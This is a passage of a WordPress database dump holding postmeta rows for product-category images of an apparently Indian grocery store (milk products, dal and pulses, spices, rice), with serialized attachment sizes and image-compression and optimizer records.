:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:10741;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:23:\"cakes-patries-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3280;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(157,197,'tiny_compress_images','a:8:{i:0;a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:381496;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:90850;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:5:\"ratio\";d:0.23810000000000001;}s:3:\"end\";i:1591599334;}s:6:\"medium\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:86126;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:25310;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:5:\"ratio\";d:0.29389999999999999;}s:3:\"end\";i:1594122788;}s:9:\"thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:22981;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:7677;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:5:\"ratio\";d:0.33410000000000001;}s:3:\"end\";i:1594122785;}s:21:\"woocommerce_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:96528;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:28133;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:5:\"ratio\";d:0.29139999999999999;}s:3:\"end\";i:1594122792;}s:29:\"woocommerce_gallery_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:10750;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:4134;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:5:\"ratio\";d:0.3846;}s:3:\"end\";i:1594122795;}s:12:\"shop_catalog\";a:0:{}s:14:\"shop_thumbnail\";a:0:{}s:21:\"yith-woocompare-image\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:48231;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:14441;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:220;s:6:\"height\";i:154;s:5:\"ratio\";d:0.2994;}s:3:\"end\";i:1591599344;}}'),(158,197,'siteground_optimizer_optimization_attempts','1'),(159,197,'siteground_optimizer_is_optimized','1'),(160,197,'siteground_optimizer_webp_conversion_attempts','1'),(161,197,'siteground_optimizer_webp_conversion_failed','1'),(163,198,'_wp_attached_file','2020/06/milk-products.png'),(164,198,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:25:\"2020/06/milk-products.png\";s:8:\"filesize\";i:31682;s:5:\"sizes\";a:3:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:25:\"milk-products-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:31197;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:25:\"milk-products-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4858;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:23:\"milk-products-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1759;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(165,198,'tiny_compress_images','a:8:{i:0;a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:89546;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:31682;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:5:\"ratio\";d:0.3538;}s:3:\"end\";i:1591599334;}s:6:\"medium\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:28014;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:11187;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:5:\"ratio\";d:0.39929999999999999;}s:3:\"end\";i:1594122786;}s:9:\"thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:9001;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:4441;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:5:\"ratio\";d:0.49340000000000001;}s:3:\"end\";i:1594122783;}s:21:\"woocommerce_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:31447;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:12175;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:5:\"ratio\";d:0.38719999999999999;}s:3:\"end\";i:1594122789;}s:29:\"woocommerce_gallery_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:4802;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:2768;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:5:\"ratio\";d:0.57640000000000002;}s:3:\"end\";i:1594122792;}s:12:\"shop_catalog\";a:0:{}s:14:\"shop_thumbnail\";a:0:{}s:21:\"yith-woocompare-image\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:16913;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:7068;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:220;s:6:\"height\";i:154;s:5:\"ratio\";d:0.41789999999999999;}s:3:\"end\";i:1591599342;}}'),(166,198,'siteground_optimizer_optimization_attempts','1'),(167,198,'siteground_optimizer_is_optimized','1'),(168,198,'siteground_optimizer_webp_conversion_attempts','1'),(169,198,'siteground_optimizer_webp_conversion_failed','1'),(171,201,'_wp_attached_file','2020/06/Ice-Cream-Novelties.png'),(172,201,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:31:\"2020/06/Ice-Cream-Novelties.png\";s:8:\"filesize\";i:51846;s:5:\"sizes\";a:3:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:31:\"Ice-Cream-Novelties-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:70033;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:31:\"Ice-Cream-Novelties-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:9414;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:29:\"Ice-Cream-Novelties-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2972;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(173,201,'tiny_compress_images','a:8:{i:0;a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:237206;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:51846;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:5:\"ratio\";d:0.21859999999999999;}s:3:\"end\";i:1591599334;}s:6:\"medium\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:57966;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:17493;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:5:\"ratio\";d:0.30180000000000001;}s:3:\"end\";i:1594122787;}s:9:\"thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:18452;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:6151;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:5:\"ratio\";d:0.33339999999999997;}s:3:\"end\";i:1594122783;}s:21:\"woocommerce_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:69411;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:19080;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:5:\"ratio\";d:0.27489999999999998;}s:3:\"end\";i:1594122790;}s:29:\"woocommerce_gallery_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:9129;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:3571;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:5:\"ratio\";d:0.39119999999999999;}s:3:\"end\";i:1594122793;}s:12:\"shop_catalog\";a:0:{}s:14:\"shop_thumbnail\";a:0:{}s:21:\"yith-woocompare-image\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:36887;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:10663;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:220;s:6:\"height\";i:154;s:5:\"ratio\";d:0.28910000000000002;}s:3:\"end\";i:1591599343;}}'),(174,201,'siteground_optimizer_optimization_attempts','1'),(175,201,'siteground_optimizer_is_optimized','1'),(176,201,'siteground_optimizer_webp_conversion_attempts','1'),(177,201,'siteground_optimizer_webp_conversion_failed','1'),(179,205,'_wp_attached_file','2020/06/dal-pulses.png'),(180,205,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:22:\"2020/06/dal-pulses.png\";s:8:\"filesize\";i:73797;s:5:\"sizes\";a:3:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:22:\"dal-pulses-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:77879;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:22:\"dal-pulses-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:9425;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:20:\"dal-pulses-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3041;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(181,205,'tiny_compress_images','a:8:{i:0;a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:266702;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:73797;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:5:\"ratio\";d:0.2767;}s:3:\"end\";i:1591599316;}s:6:\"medium\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:70223;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:21954;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:5:\"ratio\";d:0.31259999999999999;}s:3:\"end\";i:1594122781;}s:9:\"thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:19444;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:6977;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:5:\"ratio\";d:0.35880000000000001;}s:3:\"end\";i:1594122777;}s:21:\"woocommerce_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:78847;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:24820;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:5:\"ratio\";d:0.31480000000000002;}s:3:\"end\";i:1594122784;}s:29:\"woocommerce_gallery_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:9339;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:3837;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:5:\"ratio\";d:0.41089999999999999;}s:3:\"end\";i:1594122787;}s:12:\"shop_catalog\";a:0:{}s:14:\"shop_thumbnail\";a:0:{}s:21:\"yith-woocompare-image\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:40194;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:12648;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:220;s:6:\"height\";i:154;s:5:\"ratio\";d:0.31469999999999998;}s:3:\"end\";i:1591599325;}}'),(182,205,'siteground_optimizer_optimization_attempts','1'),(183,205,'siteground_optimizer_is_optimized','1'),(184,205,'siteground_optimizer_webp_conversion_attempts','1'),(185,205,'siteground_optimizer_webp_conversion_failed','1'),(187,207,'_wp_attached_file','2020/06/Dry-fruits.png'),(188,207,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:22:\"2020/06/Dry-fruits.png\";s:8:\"filesize\";i:83172;s:5:\"sizes\";a:3:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:22:\"Dry-fruits-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:86340;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:22:\"Dry-fruits-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:11168;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:20:\"Dry-fruits-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3526;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(189,207,'tiny_compress_images','a:8:{i:0;a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:295319;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:83172;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:5:\"ratio\";d:0.28160000000000002;}s:3:\"end\";i:1591599316;}s:6:\"medium\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:78891;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:26236;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:5:\"ratio\";d:0.33260000000000001;}s:3:\"end\";i:1594122776;}s:9:\"thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:22628;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:8253;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:5:\"ratio\";d:0.36470000000000002;}s:3:\"end\";i:1594122772;}s:21:\"woocommerce_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:87690;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:28909;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:5:\"ratio\";d:0.32969999999999999;}s:3:\"end\";i:1594122779;}s:29:\"woocommerce_gallery_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:11044;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:4424;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:5:\"ratio\";d:0.40060000000000001;}s:3:\"end\";i:1594122782;}s:12:\"shop_catalog\";a:0:{}s:14:\"shop_thumbnail\";a:0:{}s:21:\"yith-woocompare-image\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:45619;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:15352;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:220;s:6:\"height\";i:154;s:5:\"ratio\";d:0.33650000000000002;}s:3:\"end\";i:1591599325;}}'),(190,207,'siteground_optimizer_optimization_attempts','1'),(191,207,'siteground_optimizer_is_optimized','1'),(192,207,'siteground_optimizer_webp_conversion_attempts','1'),(193,207,'siteground_optimizer_webp_conversion_failed','1'),(195,212,'_wp_attached_file','2020/06/Masala-Spices.png'),(196,212,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:25:\"2020/06/Masala-Spices.png\";s:8:\"filesize\";i:40610;s:5:\"sizes\";a:3:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:25:\"Masala-Spices-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:58938;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:25:\"Masala-Spices-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:9766;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:23:\"Masala-Spices-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3536;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(197,212,'tiny_compress_images','a:8:{i:0;a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:219725;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:40610;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:5:\"ratio\";d:0.18479999999999999;}s:3:\"end\";i:1591599315;}s:6:\"medium\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:45113;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:13635;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:5:\"ratio\";d:0.30220000000000002;}s:3:\"end\";i:1594122775;}s:9:\"thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:15519;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:5302;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:5:\"ratio\";d:0.34160000000000001;}s:3:\"end\";i:1594122772;}s:21:\"woocommerce_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:57189;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:15274;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:5:\"ratio\";d:0.2671;}s:3:\"end\";i:1594122778;}s:29:\"woocommerce_gallery_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:8145;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:3329;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:5:\"ratio\";d:0.40870000000000001;}s:3:\"end\";i:1594122781;}s:12:\"shop_catalog\";a:0:{}s:14:\"shop_thumbnail\";a:0:{}s:21:\"yith-woocompare-image\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:31348;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:8709;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:220;s:6:\"height\";i:154;s:5:\"ratio\";d:0.27779999999999999;}s:3:\"end\";i:1591599324;}}'),(198,212,'siteground_optimizer_optimization_attempts','1'),(199,212,'siteground_optimizer_is_optimized','1'),(200,212,'siteground_optimizer_webp_conversion_attempts','1'),(201,212,'siteground_optimizer_webp_conversion_failed','1'),(203,213,'_wp_attached_file','2020/06/Edible-oil-ghee.png'),(204,213,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:27:\"2020/06/Edible-oil-ghee.png\";s:8:\"filesize\";i:65446;s:5:\"sizes\";a:3:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:27:\"Edible-oil-ghee-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:80633;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:27:\"Edible-oil-ghee-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:11277;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:25:\"Edible-oil-ghee-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3643;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(205,213,'tiny_compress_images','a:8:{i:0;a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:305387;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:65446;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:5:\"ratio\";d:0.21429999999999999;}s:3:\"end\";i:1591599313;}s:6:\"medium\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:70710;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:20521;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:5:\"ratio\";d:0.29020000000000001;}s:3:\"end\";i:1594122773;}s:9:\"thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:21799;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:7118;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:5:\"ratio\";d:0.32650000000000001;}s:3:\"end\";i:1594122770;}s:21:\"woocommerce_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:81048;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:22498;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:5:\"ratio\";d:0.27760000000000001;}s:3:\"end\";i:1594122777;}s:29:\"woocommerce_gallery_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:11020;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:4181;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:5:\"ratio\";d:0.37940000000000002;}s:3:\"end\";i:1594122780;}s:12:\"shop_catalog\";a:0:{}s:14:\"shop_thumbnail\";a:0:{}s:21:\"yith-woocompare-image\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:43290;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:12170;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:220;s:6:\"height\";i:154;s:5:\"ratio\";d:0.28110000000000002;}s:3:\"end\";i:1591599323;}}'),(206,213,'siteground_optimizer_optimization_attempts','1'),(207,213,'siteground_optimizer_is_optimized','1'),(208,213,'siteground_optimizer_webp_conversion_attempts','1'),(209,213,'siteground_optimizer_webp_conversion_failed','1'),(211,215,'_wp_attached_file','2020/06/Rice.png'),(212,215,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:16:\"2020/06/Rice.png\";s:8:\"filesize\";i:109567;s:5:\"sizes\";a:3:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:16:\"Rice-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:91988;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:16:\"Rice-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:11310;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:14:\"Rice-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3379;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(213,215,'tiny_compress_images','a:8:{i:0;a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:311969;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:109567;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:5:\"ratio\";d:0.35120000000000001;}s:3:\"end\";i:1591599313;}s:6:\"medium\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:85699;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:32494;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:300;s:6:\"height\";i